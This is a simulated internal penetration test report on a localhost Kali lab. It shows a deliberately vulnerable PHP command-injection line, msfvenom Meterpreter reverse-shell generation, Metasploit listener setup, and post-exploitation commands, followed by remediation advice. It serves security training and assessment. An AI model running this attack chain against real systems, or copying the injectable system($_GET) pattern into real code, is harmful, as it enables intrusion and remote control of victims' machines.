## https://sploitus.com/exploit?id=612FC486-5A30-55ED-BE1F-C1DFDDA1A93F
# Internal-Penetration-Test-Report-Web-Exploitation-Post-Exploitation-Using-Metasploit-
Simulated internal penetration test using Metasploit on a Kali Linux VM, demonstrating PHP command injection, reverse shell, and Meterpreter post-exploitation. Includes full attack chain analysis and highlights critical RCE risk. Logs and security events were correlated and validated using Wazuh for detection and monitoring.
Internal Penetration Test Report
Assessment Type: Simulated Internal Penetration Test
Environment: Kali Linux VM (Localhost Simulation)
Date: 30 May 2026
## 1. Executive Summary
This assessment simulated an internal penetration test from an attacker’s perspective within a controlled Kali Linux environment. The objective was to identify vulnerabilities, exploit misconfigurations, and demonstrate post-exploitation capabilities.
The test successfully achieved remote code execution (RCE) via a vulnerable PHP web application, resulting in a Meterpreter session as a low-privileged user (webuser). Sensitive data was accessed, confirming full compromise of the application layer.
Overall Risk Rating: Critical
## 2. Scope and Methodology
Scope
* Target: 127.0.0.1 (localhost)
* Users:
* victim
* webuser
* Services:
* Web server (port 8080)
* Echo service (port 9003)
* SSH (port 22)
Methodology
The engagement followed standard penetration testing phases:
1. Environment setup
2. Service simulation
3. Reconnaissance
4. Exploitation
5. Post-exploitation
6. Reporting
## 3. Environment Setup & Service Simulation
Two users were created to simulate a realistic internal environment:
sudo adduser victim --disabled-password --gecos ""
sudo adduser webuser --disabled-password --gecos ""
A vulnerable web application was deployed:
echo '' | sudo tee /home/webuser/web/uploads/upload.php
echo "FLAG{simulated_web_flag}" | sudo tee /home/webuser/web/uploads/flag.txt
sudo chown -R webuser:webuser /home/webuser/web
This introduced a command injection vulnerability, allowing arbitrary OS command execution via URL parameters.
The PHP web server was started:
sudo -u webuser php -S 127.0.0.1:8080 -t /home/webuser/web/uploads
Internal Service Simulation
A custom echo service was created and executed:
sudo -u victim nohup python3 /home/victim/fake_service.py > /tmp/fake_service.log 2>&1 &
Interaction confirmed service functionality:
nc 127.0.0.1 9003
Welcome to Echo Service
hi
ECHO: hi
This represents an unauthenticated internal service, increasing attack surface.
## 4. Reconnaissance
A targeted scan was performed:
nmap -p 22,8080,9003 127.0.0.1
## Results
Port State Service
22 Open SSH
8080 Closed HTTP (initial scan)
9003 Open Unknown (custom service)
The echo service on port 9003 was identified as a non-standard service with no authentication.
## 5. Exploitation
Payload Generation
A PHP Meterpreter reverse shell was created:
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4443 -f raw -o shell.php
## Payload deployment:
sudo cp shell.php /home/webuser/web/uploads/shell.php
sudo chown webuser:webuser /home/webuser/web/uploads/shell.php
## Listener Setup
Metasploit handler configured:
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4443
run
## Exploit Execution
Triggering the payload:
curl http://127.0.0.1:8080/shell.php
Successful Compromise
[*] Meterpreter session 1 opened (127.0.0.1:4443 -> 127.0.0.1:57512)
This confirms successful remote code execution.
## 6. Post-Exploitation
### System Enumeration
sysinfo
Output:
* OS: Linux Kali
* Architecture: x64
User Context
getuid
Result:
Server username: webuser
## File System Access
ls
cat flag.txt
Output:
FLAG{simulated_web_flag}
This confirms successful access to sensitive data.
Shell Access
shell
whoami
id
uname -a
Output:
webuser
uid=1002(webuser) gid=1002(webuser)
Linux kali ...
This demonstrates full command execution capability under the compromised user.
## 7. Vulnerabilities Identified
7.1 Command Injection (Critical)
Location: upload.php
Description:
The application executes user input directly:
system($_GET["cmd"]);
Impact:
* Remote command execution
* Full system compromise
## 7.2 Insecure File Upload (High)
* No validation of uploaded files
* Execution of arbitrary PHP scripts allowed
## 7.3 Unauthenticated Internal Service (Medium)
* Echo service exposed on port 9003
* No authentication or input validation
## 8. Remediation Recommendations
Immediate Fixes
* Remove unsafe PHP functions (system)
* Implement input validation and sanitisation
* Disable execution in upload directories
## Additional Controls
* Apply least privilege principles
* Restrict internal service access
* Implement firewall segmentation
* Enable logging and monitoring
## 9. Conclusion
The assessment demonstrated how a simple web application vulnerability can lead to full system compromise. The combination of insecure coding practices and exposed services allowed rapid exploitation and data access.
In a real-world environment, this level of access could be leveraged for lateral movement, privilege escalation, and persistence.
## 10. Key Takeaways
* Internal environments are not inherently secure
* Input validation is critical
* Misconfigured services increase risk
* Post-exploitation capabilities enable deeper compromise
End of Report